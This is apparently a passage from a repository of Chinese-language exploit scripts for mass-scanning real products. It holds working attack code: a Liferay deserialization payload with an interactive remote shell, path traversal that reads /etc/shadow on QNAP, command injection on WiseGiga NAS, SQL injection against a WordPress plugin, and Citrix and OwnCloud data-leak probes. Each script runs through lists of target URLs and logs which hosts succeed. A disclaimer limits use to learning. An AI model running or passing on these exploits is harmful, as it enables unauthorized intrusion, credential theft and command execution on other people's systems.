64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78' 18 | post_data = ( 19 | 'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}' 20 | ) 21 | headers = { 22 | 'Content-Type': 'application/x-www-form-urlencoded', 23 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36", 24 | "jk": cmd 25 | } 26 | api_url = '{url}/api/jsonws/invoke'.format(url=url) 27 | resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False) 28 | pattern = '~~~(.*?)~~~' 29 | match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I) 30 | if match: 31 | result = match.group(1) 32 | result = result.strip() 33 | with open(success_file, 'a') as s_file: 34 | s_file.write(f"++++++++++++++++++\n") 35 | s_file.write(f"目标URL: {url}\n") 36 | s_file.write(f"Payload: {cmd}\n") 37 | s_file.write(f"响应内容:\n{result}\n\n") 38 | 39 | if interactive: 40 | print(f"目标URL: {url}") 41 | print(f"Payload: {cmd}") 42 | print(f"响应内容:\n{result}\n") 43 | while True: 44 | user_input = input("请输入要执行的命令或输入'exit'退出: ") 45 | if user_input == 'exit': 46 | break 47 | interactive_cmd = user_input.strip() 48 | interactive_result = check_for_vulnerability(url, interactive_cmd, False, proxies, success_file) 49 | if interactive_result: 50 | print(f"响应内容:\n{interactive_result}\n") 51 | 52 | return result # 返回结果字符串 53 | except Exception as e: 54 | print(f"发生异常:{e}") 55 | return None 56 | 57 | def scan_targets(targets, cmd, interactive=False, proxies={}, success_file=None): 58 | for target in targets: 59 | target = target.strip() 60 | check_for_vulnerability(target, cmd, interactive, proxies, success_file) 61 | 62 | if __name__ == '__main__': 63 | parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞CVE-2020-7961") 64 | parser.add_argument("-u", "--url", help="目标URL") 65 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 66 | parser.add_argument("-c", "--cmd", help="要执行的命令") 67 | parser.add_argument("-i", "--interactive", action="store_true", help="启用交互式Shell模式") 68 | args = parser.parse_args() 69 | 70 | if not args.url and not args.file: 71 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 72 | exit(1) 73 | 74 | if args.url: 75 | urls = [args.url] 76 | elif args.file: 77 | with open(args.file, 'r') as file: 78 | urls = file.readlines() 79 | 80 | proxies = {} 81 | success_file = 'success_targets.txt' 82 | 83 | for url in urls: 84 | url = url.strip() 85 | if not url.startswith("http://") and not url.startswith("https://"): 86 | scan_targets(["http://" + url, "https://" + url], args.cmd, args.interactive, proxies, success_file) 87 | else: 88 | scan_targets([url], args.cmd, args.interactive, proxies, success_file) 89 | 90 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 91 | -------------------------------------------------------------------------------- /OwnCloud_CVE-2023-49105_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-12-05 3 | import requests 4 | import argparse 5 | import threading 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 7 | 8 | def check_phpinfo(url, success_file=None): 9 | try: 10 | response = requests.get(url, verify=False) # Bypass SSL verification 11 | if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text: 12 | return response.text 13 | except Exception as e: 14 | pass 15 | return False 16 | 17 | def check_for_vulnerability(url, proxies=None, success_file=None): 18 | try: 19 | url_variant1 = url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css" 20 | url_variant2 = url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css" 21 | 22 | response_text = check_phpinfo(url_variant1) or check_phpinfo(url_variant2) 23 | if response_text: 24 | print(f"目标URL: {url} ") 25 | with open(success_file, 'a') as s_file: 26 | s_file.write(f"++++++++++++++++++\n") 27 | s_file.write(f"目标URL: {url}\n") 28 | s_file.write(f"响应内容: {response_text}\n\n") 29 | return True 30 | else: 31 | return False 32 | except Exception as e: 33 | print(f"发生异常:{e}") 34 | return False 35 | 36 | def scan_targets(targets, proxies=None, success_file=None): 37 | for target in targets: 38 | target = target.strip() 39 | check_for_vulnerability(target, proxies, success_file) 40 | 41 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 42 | threads = [] 43 | 44 | for i in range(num_threads): 45 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 46 | threads.append(thread) 47 | 48 | for thread in threads: 49 | thread.start() 50 | 51 | for thread in threads: 52 | thread.join() 53 | 54 | if __name__ == '__main__': 55 | parser = argparse.ArgumentParser(description="OwnCloud 敏感信息泄漏漏洞CVE-2023-49103") 56 | parser.add_argument("-u", "--url", help="目标URL") 57 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 58 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 59 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 60 | args = parser.parse_args() 61 | 62 | if not args.url and not args.file: 63 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 64 | exit(1) 65 | 66 | if args.url: 67 | urls = [args.url] 68 | elif args.file: 69 | with open(args.file, 'r') as file: 70 | urls = file.readlines() 71 | 72 | success_file = 'success_targets.txt' 73 | 74 | proxies = { 75 | "http": args.proxy, 76 | "https": args.proxy 77 | } if args.proxy else None 78 | 79 | multi_threaded_scan(urls, proxies, success_file, args.threads) 80 | 81 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 82 | -------------------------------------------------------------------------------- /QNAP-NAS_CVE-2024-21889_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2024-03-20 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import httplib2 8 | import random 9 | import re 10 | import string 11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 12 | 13 | def check_for_vulnerability(url, proxies=None, success_file=None): 14 | data="wiz_func=start_2sv&action=none&user=guest&pwd=none" 15 | 16 | headers = {'User-Agent': 'curl/8.6.0', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'} 17 | 18 | try: 19 | response = requests.post(url+"/cgi-bin/priv/privWizard.cgi",data=data,verify=False, timeout=5,headers=headers) 20 | if response.status_code==200 and "" in response.text: 21 | print(f"目标URL: {url}") 22 | with open(success_file, 'a') as s_file: 23 | s_file.write(f"++++++++++++++++++\n") 24 | s_file.write(f"目标URL: {url}\n") 25 | s_file.write(f"响应内容: {response.text}\n\n") 26 | return True 27 | except Exception as e: 28 | print(f"发生异常:{e}") 29 | return False 30 | 31 | def scan_targets(targets, proxies=None, success_file=None): 32 | for target in targets: 33 | target = target.strip() 34 | check_for_vulnerability(target, proxies, success_file) 35 | 36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 37 | threads = [] 38 | 39 | for i in range(num_threads): 40 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 41 | threads.append(thread) 42 | 43 | for thread in threads: 44 | thread.start() 45 | 46 | for thread in threads: 47 | thread.join() 48 | 49 | if __name__ == '__main__': 50 | parser = argparse.ArgumentParser(description="QNAP NAS身份验证缺失漏洞CVE-2024-21899") 51 | parser.add_argument("-u", "--url", help="目标URL") 52 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 53 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 54 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 55 | args = parser.parse_args() 56 | 57 | if not args.url and not args.file: 58 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 59 | exit(1) 60 | 61 | if args.url: 62 | urls = [args.url] 63 | elif args.file: 64 | with open(args.file, 'r') as file: 65 | urls = file.readlines() 66 | 67 | success_file = 'success_targets.txt' 68 | 69 | proxies = { 70 | "http": args.proxy, 71 | "https": args.proxy 72 | } if args.proxy else None 73 | 74 | multi_threaded_scan(urls, proxies, success_file, args.threads) 75 | 76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 77 | -------------------------------------------------------------------------------- /QNAP_CVE-2019-7192_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-12-22 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import re 8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 9 | 10 | def check_for_vulnerability(url, proxies=None, success_file=None): 11 | try: 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0", 14 | "Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8", 15 | "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 16 | "Accept-Encoding":"gzip, deflate", 17 | "Connection":"close", 18 | "Upgrade-Insecure-Requests":"1", 19 | "Pragma":"no-cache", 20 | "Cache-Control":"no-cache", 21 | "Content-Type":"application/x-www-form-urlencoded" 22 | } 23 | 24 | req = requests.Session() 25 | 26 | # search album_id 27 | 28 | print("="*65) 29 | post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} 30 | album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10) 31 | 32 | if album_id_response.status_code != 200: 33 | print("album id not found \n\033[91mnot vulnerable\033[0m") 34 | return False 35 | 36 | album_id = re.search('(?<=).*?(?=)', album_id_response.text).group() 37 | 38 | # search $_SESSION['access_code'] 39 | 40 | access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10) 41 | if access_code_response.status_code != 200: 42 | print("slideshow not found \n\033[91mnot vulnerable\033[0m") 43 | return False 44 | 45 | access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group() 46 | 47 | def get_file_content(file): 48 | post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file} 49 | file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10) 50 | print(f"目标URL: {url}, 响应内容: {file_read_response.text}") 51 | with open(success_file, 'a') as s_file: 52 | s_file.write("=" * 65 + "\n") 53 | s_file.write(f"目标URL: {url}\n") 54 | s_file.write(f"响应内容: {file_read_response.text}\n\n") 55 | 56 | # get_file_content('./../../../../../etc/hostname') 57 | get_file_content('./../../../../../etc/shadow') 58 | 59 | except Exception as e: 60 | print(f"发生异常:{e}") 61 | return False 62 | 63 | def scan_targets(targets, proxies=None, success_file=None): 64 | for target in targets: 65 | target = target.strip() 66 | check_for_vulnerability(target, proxies, success_file) 67 | 68 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 69 | threads = [] 70 | 71 | for i in range(num_threads): 72 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 73 | threads.append(thread) 74 | 75 | for thread in threads: 76 | thread.start() 77 | 78 | for thread in threads: 79 | thread.join() 80 | 81 | if __name__ == '__main__': 82 | parser = argparse.ArgumentParser(description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192") 83 | parser.add_argument("-u", "--url", help="目标URL") 84 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 85 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 86 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 87 | args = parser.parse_args() 88 | 89 | if not args.url and not args.file: 90 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 91 | exit(1) 92 | 93 | if args.url: 94 | urls = [args.url] 95 | elif args.file: 96 | with open(args.file, 'r') as file: 97 | urls = file.readlines() 98 | 99 | success_file = 'success_targets.txt' 100 | 101 | proxies = { 102 | "http": args.proxy, 103 | "https": args.proxy 104 | } if args.proxy else None 105 | 106 | multi_threaded_scan(urls, proxies, success_file, args.threads) 107 | 108 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 109 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ExploitHunter 2 | **【免责声明】**
3 | 4 | 本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。 5 | 6 | **【最近更新】** 7 | 8 | 9 | - 2024-03-20 10 | - QNAP NAS身份验证缺失漏洞CVE-2024-21899 11 | 12 | - 2024-01-22 13 | - Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527 14 | 15 | - 2023.12.30 16 | - Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467 17 | 18 | - 2023.12.04 19 | - Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /WiseGigaNAS_rce_exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-11-17 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import httplib2 8 | import random 9 | import re 10 | import string 11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 12 | 13 | def check_for_vulnerability(url, proxies=None, success_file=None): 14 | try: 15 | headers = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 17 | } 18 | paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt'] 19 | 20 | for path in paths: 21 | target_url = url + path 22 | response = requests.get(target_url, headers=headers, timeout=10, verify=False) 23 | 24 | if response.status_code == 200 and "window.open" in response.text: 25 | response2 = requests.get(url + paths[1], headers=headers, timeout=10, verify=False) 26 | if response2.status_code == 200 and "uid=" in response2.text: 27 | print(f"目标URL: {url}") 28 | with open(success_file, 'a') as s_file: 29 | s_file.write(f"++++++++++++++++++\n") 30 | s_file.write(f"目标URL: {url}\n") 31 | s_file.write(f"响应内容: {response2.text}\n\n") 32 | return True 33 | 34 | except Exception as e: 35 | print(f"发生异常:{e}") 36 | 37 | return False 38 | 39 | def scan_targets(targets, proxies=None, success_file=None): 40 | for target in targets: 41 | target = target.strip() 42 | check_for_vulnerability(target, proxies, success_file) 43 | 44 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 45 | threads = [] 46 | 47 | for i in range(num_threads): 48 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 49 | threads.append(thread) 50 | 51 | for thread in threads: 52 | thread.start() 53 | 54 | for thread in threads: 55 | thread.join() 56 | 57 | if __name__ == '__main__': 58 | parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞") 59 | parser.add_argument("-u", "--url", help="目标URL") 60 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 61 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 62 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 63 | args = parser.parse_args() 64 | 65 | if not args.url and not args.file: 66 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 67 | exit(1) 68 | 69 | if args.url: 70 | urls = [args.url] 71 | elif args.file: 72 | with open(args.file, 'r') as file: 73 | urls = file.readlines() 74 | 75 | success_file = 'success_targets.txt' 76 | 77 | proxies = { 78 | "http": args.proxy, 79 | "https": args.proxy 80 | } if args.proxy else None 81 | 82 | multi_threaded_scan(urls, proxies, success_file, args.threads) 83 | 84 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 85 | -------------------------------------------------------------------------------- /WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-11-16 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import time 8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 9 | 10 | def check_for_vulnerability(url, proxies=None, success_file=None): 11 | try: 12 | headers = {'Cookie': 'wpsc_guest_login_auth={"email":"\' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}'} 13 | 14 | # 检查响应时间 15 | start_time = time.time() 16 | response = requests.get(url, headers=headers, proxies=proxies, verify=False) 17 | end_time = time.time() 18 | duration = end_time - start_time 19 | 20 | if response.status_code == 200 and "supportcandy" in response.text and duration >= 6: 21 | print(f"目标URL: {url}") 22 | with open(success_file, 'a') as s_file: 23 | s_file.write(f"++++++++++++++++++\n") 24 | s_file.write(f"目标URL: {url}\n") 25 | s_file.write(f"响应内容: 响应时间:{duration} 秒\n\n") 26 | return True 27 | except Exception as e: 28 | print(f"发生异常:{e}") 29 | return False 30 | 31 | def scan_targets(targets, proxies=None, success_file=None): 32 | for target in targets: 33 | target = target.strip() 34 | check_for_vulnerability(target, proxies, success_file) 35 | 36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 37 | threads = [] 38 | 39 | for i in range(num_threads): 40 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 41 | threads.append(thread) 42 | 43 | for thread in threads: 44 | thread.start() 45 | 46 | for thread in threads: 47 | thread.join() 48 | 49 | if __name__ == '__main__': 50 | parser = argparse.ArgumentParser(description="WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730") 51 | parser.add_argument("-u", "--url", help="目标URL") 52 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 53 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 54 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 55 | args = parser.parse_args() 56 | 57 | if not args.url and not args.file: 58 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 59 | exit(1) 60 | 61 | if args.url: 62 | urls = [args.url] 63 | elif args.file: 64 | with open(args.file, 'r') as file: 65 | urls = file.readlines() 66 | 67 | success_file = 'success_targets.txt' 68 | 69 | proxies = { 70 | "http": args.proxy, 71 | "https": args.proxy 72 | } if args.proxy else None 73 | 74 | multi_threaded_scan(urls, proxies, success_file, args.threads) 75 | 76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 77 | -------------------------------------------------------------------------------- /citrix_CVE-2023-4966_exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-27 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | import urllib3 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 10 | 11 | def check_for_vulnerability(url, proxies=None, success_file=None): 12 | headers = { 13 | "Host": "a"*24576 14 | } 15 | try: 16 | response = requests.get(url + "/oauth/idp/.well-known/openid-configuration", headers=headers, proxies=proxies, verify=False, timeout=10) 17 | print(url + "/oauth/idp/.well-known/openid-configuration") 18 | print(response) 19 | if response.status_code == 200: 20 | with open(success_file, 'a') as s_file: 21 | s_file.write(f"++++++++++++++++++\n") 22 | s_file.write(f"目标URL: {url}\n") 23 | s_file.write(f"Payload: Dumped Memory\n") 24 | s_file.write(f"响应内容:\n{response.text[131050:]}\n\n") 25 | return True 26 | except Exception as e: 27 | print(f"发生异常:{e}") 28 | return False 29 | 30 | def scan_targets(targets, proxies=None, success_file=None): 31 | for target in targets: 32 | target = target.strip() 33 | check_for_vulnerability(target, proxies, success_file) 34 | 35 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 36 | threads = [] 37 | 38 | for i in range(num_threads): 39 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 40 | threads.append(thread) 41 | 42 | for thread in threads: 43 | thread.start() 44 | 45 | for thread in threads: 46 | thread.join() 47 | 48 | if __name__ == '__main__': 49 | parser = argparse.ArgumentParser(description="Citrix NetScaler ADC & Gateway信息泄露漏洞 CVE-2023-4966") 50 | parser.add_argument("-u", "--url", help="目标URL") 51 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 52 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 53 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 54 | args = parser.parse_args() 55 | 56 | if not args.url and not args.file: 57 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 58 | exit(1) 59 | 60 | if args.url: 61 | urls = [args.url] 62 | elif args.file: 63 | with open(args.file, 'r') as file: 64 | urls = file.readlines() 65 | 66 | success_file = 'success_targets.txt' 67 | 68 | proxies = { 69 | "http": args.proxy, 70 | "https": args.proxy 71 | } if args.proxy else None 72 | 73 | multi_threaded_scan(urls, proxies, success_file, args.threads) 74 | 75 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 76 | -------------------------------------------------------------------------------- /f5_CVE-2023-46747_exploit.py: -------------------------------------------------------------------------------- 1 | (抱歉,脚本存在问题,无法正常使用,所以先删了!仅作学习) 2 | -------------------------------------------------------------------------------- /juniper-cve-2023-36845.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-9-22 3 | 4 | import requests 5 | import argparse 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 7 | 8 | def check_for_vulnerability(url, proxies={}, success_file=None): 9 | headers = { 10 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", 11 | } 12 | payload = 